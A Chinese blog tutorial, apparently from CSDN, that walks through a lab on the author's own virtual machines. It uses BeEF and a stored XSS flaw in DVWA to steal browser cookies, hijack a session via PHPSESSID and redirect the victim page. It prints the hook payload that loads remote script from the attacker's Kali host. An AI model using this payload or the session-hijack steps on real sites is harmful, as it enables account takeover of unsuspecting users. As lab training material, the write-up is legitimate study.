利用beef盗取浏览器cookie,并实现页面跳转

最新推荐文章于 2024-05-02 22:37:12 发布
最新推荐文章于 2024-05-02 22:37:12 发布
阅读量1.8k 收藏 11
点赞数
分类专栏: web 文章标签: 渗透测试 web 安全漏洞 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50688050/article/details/117001875
版权

目录

 

实验环境

搭建靶场

安装工具

实验步骤

登录网站插入恶意语句

用户正常访问网站

成功上线

劫持用户cookie登录

页面跳转

实验环境

  • KALI
    • kali中需要安装beef工具
  • DVWA靶场
  • 客户端

我是在本地搭的靶场,然后开两台虚拟机,一台kali当作攻击者,一台任何系统的主机

搭建靶场

首先搭建靶场,开启phpstudy让让别人可以访问就可以了(我这边的靶场是安装好的,如果没有安装的话可以先去下载)

下载安装步骤:先去phpstady官网下载一个最新版的phpstudy(这个最新版的不用配置环境直接安装就能用特别方便),然后找到DWVS的数据包下载下来(如果找不到的话我可以发给你),放到phpstudy的www目录下(这边就是简要说一下安装过程,如果不会的话可以去搜索一些DWVA的安装教程很详细)

在主机中开启DVWA靶场并将安全程度调到低,就开启完成了

安装工具

在kali中安装beef

   apt-get update
   apt-get install beef-xss

beef首次登录是需要账号密码的,可以进配置文件修改一些账号密码,或者不修改也可以但是也要看一下配置文件中默认账号密码到底是啥

vim   /etc/beef-xss/config.yaml

准备工作到这里就差不多了,简单说一下我的环境,我主机是win10 ,虚拟机一台kali 一台win10

实验步骤

1、启动服务

 beef-xss

启动后回看到一些生成好的链接

可以先把这三条语句复制出来一会儿会用到,第一条是beef工具的登录页面,如果不是用kali登录的话可以把127.0.0.1换成kali的IP地址,第二条是一个恶意语句,第三条是恶意语句的具体实例。

而且会自动启动浏览器并跳转到登录界面,登录之后大概就是这样

登录网站插入恶意语句

首先我们在kali中登录网站,IP地址就是本机的IP地址,然后为了演示实验效果我们把安全程度调到最低

我们利用到的xss的存储型漏洞,在我们输入payload(我们使用刚才复制下来的第三条语句,将语句中127.0.0.1改为kali的IP地址就可以)的时候发现有长度限制,不过没有关系我们可以在前端更改按f12进入开发者模式

在name行输入我们构造好的payload

<script src="http://kaliIP地址:3000/hook.js"></script>

 

可以看到这边是不显示我们的js语句的,这个界面显示我们的payload已经上传成功了

用户正常访问网站

正常登录网站

也需要将安全程度调到low,然后点击xss(stored)

 

 

 

 

成功上线

当用户登录到这个网站的时候我们切回kali的beef中可以看到用户已经成功上线了

 

点击右下角的execut执行,就可以抓取到用户的cookie了(我这边因为电脑配置有点低,同时开两台虚拟机有点卡,所以就把主机当成用户来抓取意思是一样的,主要是理解,理解万岁)

劫持用户cookie登录

其实我们主要使用的是cookie中的PHPSESSID把等号后面的一串字符复制下来

然后通过浏览器正常登录

复制到这个位置,然后保存

然后我们退出登录界面,刷新一下就可以直接登录了(如果进不去可以看一下PHPSSID是否保存)

页面跳转

查看用户界面

成功跳转

鲨鱼辣椒k
关注
  • 0
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
使用beef劫持用户浏览器
Cwillchris的博客
06-29 381
BeEF( The Browser Exploitation Framework) 是由 Wade Alcorn(瓦德·奥尔康) 在 2006 年开始创建的,至今还在维护。是由 ruby 语言开发的专门针对浏览器攻击的框架。执行的过程,就像这种恶意弹窗:zombie(僵尸)即受害的浏览器。zombie 是被 hook(勾连)的,如果浏览器访问了有勾子(由 js 编写)的页面,就会被 hook,勾连的浏览器会执行初始代码返回一些信息,接着 zombie 会每隔一段 时间(默认为 1 秒)就会向 BeEF 服务
cookie免登录
Harrison的学习博客
02-21 704
相信大家在平时浏览网站的时候,都见过诸如七天免登录或者记住密码的功能。如果用户勾选了该功能,则可以帮助用户自动登录,这样显得网站更加友好。如果没有勾选,那么用户下一次登录网站仍需要填写用户名和密码。 所以今天我们来简单了解下有关cookie免登录的知识。 废话不多说,我们直接上最关键的代码: if (this.IsSavePwd.Checked)//判断是否勾选复选框 { //存c...
day07beef-xss之根据beef-xss获取cookies
最新发布
guowu666的博客
05-02 301
若报错运行不了尝试。
Cookie实现用户名和密码自动登录
花伤情犹在的博客
06-24 4948
前言 我们在访问网站的时候,有的网站一天之内访问好几次,如果用户每次访问都需要这些登录操作就会感到相当厌烦。所以通过Cookie的技术手段让网站“记住”那些在曾经登录过的用户。当该用户下次再来访问的时候,网站可以识别该用户,并为其自动完成登录过程。 实现用户名和密码自动登录效果: 登录界面 效果图 代码: <%@ page contentType="text/html;charset=UTF-8" language="java" %> <% String username
黑客是怎么 cookie 获取?钓鱼?键盘记录?
weixin_72959097的博客
06-29 339
修改 C:\xampp\htdocs\pkxss\xcookie 下的 cookie.php,将 IP 地址改为漏洞服务器的地址(这里注意一下因为 xss 后台是可以单独拿出来运行的后台,所以我将 pkxss 后台文件从 pikachu 文件拿出来放在 pikachu 同一目录下)当用户提交的时候,我们就能取得用户Cookie, 提交过后页面刷新到 pikachu 的页面这样达到我们想要要求。的后台页面,访问的时候通过 document 中的 cookie 把本地 cookie 的值带过去。
跨站脚本攻击实验-beef
m0_63645854的博客
09-16 405
本文主要介绍了XSS工具/手工攻击的原理,XSS工具/手工攻击的方法以及防御XSS的方法/原理
【Kali】kali主要工具使用说明(文末附超全思维导图)
热门推荐
PP_zi的博客
05-11 3万+
本文为《从实践中学习Kali Linux渗透测试》总结笔记,仅供学习使用,禁止用于非法用途,转载请附上原文链接! 1. 信息收集 1.1 发现主机 traceroute 获取目标主机的路由条目,确定网络拓扑。每一跳表示一个网关,星号可能为防火墙导致。 1.1.1 扫描主机 ① nmap nmap -sP ip/ip段 对目标主机实施ping扫描,探测主机是否在线 也可以通过其他语法,扫描主机开放端口、使用的操作系统等 ② Netdiscover ARP侦查工具,可以扫描IP地址,检查在线主机。 .
kali-beef攻击浏览器-运维安全详细笔记总结
06-30
kali-beef攻击浏览器-运维安全详细笔记总结
docker-beef:BeEF浏览器开发框架)构建的 Dockerfile
06-20
码头牛肉BeEF 的 Dockerfile(浏览器开发框架) 拉取存储库docker pull malwarelu/beef 启动 BeEF docker docker run malwarelu/beef 正在运行的容器上的 TCP/3000 上可用的服务
E017-渗透测试常用工具-使用Beef对客户端浏览器进行劫持.pdf
12-02
E017-渗透测试常用工具-使用Beef对客户端浏览器进行劫持
beef获取目标主机用户名和密码.docx
03-29
Beef 是一个专业的浏览器漏洞利用框架,主要用于合法研究和测试目的。下面是使用 Beef 获取目标主机用户名和密码的知识点: 一、Beef 简介 Beef 是一个基于 Ruby 的浏览器漏洞利用框架,旨在提供一个统一的平台,...
beef插件翻译.docx
12-09
Beef 插件是一个功能强大且广泛使用的渗透测试工具,它提供了多种模块来实现不同的攻击和信息收集任务。下面是 Beef 插件翻译文档中的知识点总结: 1. Module Tree(模块树): Module Tree 是 Beef 插件的核心...
BeEF
XY011009的博客
12-13 651
使用BeEF 首先进入beef beef先给出了一个例子,web ui 是这个beef的位置,可以用浏览器进入 Hook则是一个脚本文件,一个js的脚本 example则是一个xss 的例子,这个例子是让受害者访问那个src指向的链接,访问里面的hook的js脚本,执行了这个脚本 利用漏洞注入脚本,这是一个存储型xss,用户进入到这个页面则直接执行这个脚本了。然后就获得了cookiebeef中...
xss获取cookie的方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-27 1790
​xss获取cookie简单步骤如下: 1、在存在漏洞的论坛中发日志。 2、然后以管理远登陆,进入后页面会跳转,此时cookie就发送到你的服务器下的code.txt文件中了。 3、这是没有账户前的登陆界面。 4、打开firefox的Tamper Data插件,点击Start Tamper开始抓取信息,刷新登陆界面,然后会跳出对话框,点击Tamper按钮,在途中的cookie一栏中替换掉你抓取到的cookie,单击确定发送请求数据,xss获取cookie 5、替换cookie后不用输用户名密码
BEEF的简介与使用
永远是少年
10-31 2099
今天继续给大家介绍渗透测试相关知识,本文主要内容是BEEF的简介与使用。 一、BEEF简介 二、BEEF渗透测试实战
初探BeEF
weixin_30258901的博客
01-23 286
1.什么是BeEF? 就是The Browser Exploitation Framework 的缩写,意在通过一些手段,控制对方的浏览器。 里面集成了很多模块,能够获取很多东西,有cookie浏览器名字,版本,插件,是否支持java,vb,flash等,所以说XSS神器嘛。。 大概长这个样子(默认用户名密码是beefbeef): 2.安装beef和使用beef BT5...
XSS漏洞利用手段/篡改链接实战/beef生成恶意网页
ChenD的学习笔记
10-10 1180
XSS篡改网页链接,beef生成恶意脚本,搭建恶意网页,劫持目标主机
BeEF的使用
谢公子的博客
09-17 1万+
目录 BeEFBeEF-XSS的使用 获取用户Cookie 网页重定向 社工弹窗 钓鱼网站(结合DNS欺骗) BeEF BEEF (The Browser Exploitation Framework):一款浏览器攻击框架,用Ruby语言开发的,Kali中默认安装的一个模块,用于实现对XSS漏洞的攻击和利用BeEF主要是往网页中插入一段名为hook.js的JS脚本代...
beef的简单使用
weixin_44940180的博客
07-23 3489
beef Beef主要是往网页中插入一段名为hook.js的JS脚本代码,如果浏览器访问了有hook.js(钩子)的页面,就会被hook(勾住),勾连的浏览器会执行初始代码返回一些信息,接着目标主机会每隔一段时间(默认为1秒)就会向BeEF服务器发送一个请求,询问是否有新的代码需要执行 Beef服务器本质上就像一个Web应用,被分为前端和后端。前端会轮询后端是否有新的数据需要更新,同时前端也可以向后端发送指示, BeEF持有者可以通过浏览器来登录 BeEF 的后端,来控制前端(用户浏览器) Beef一般和

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值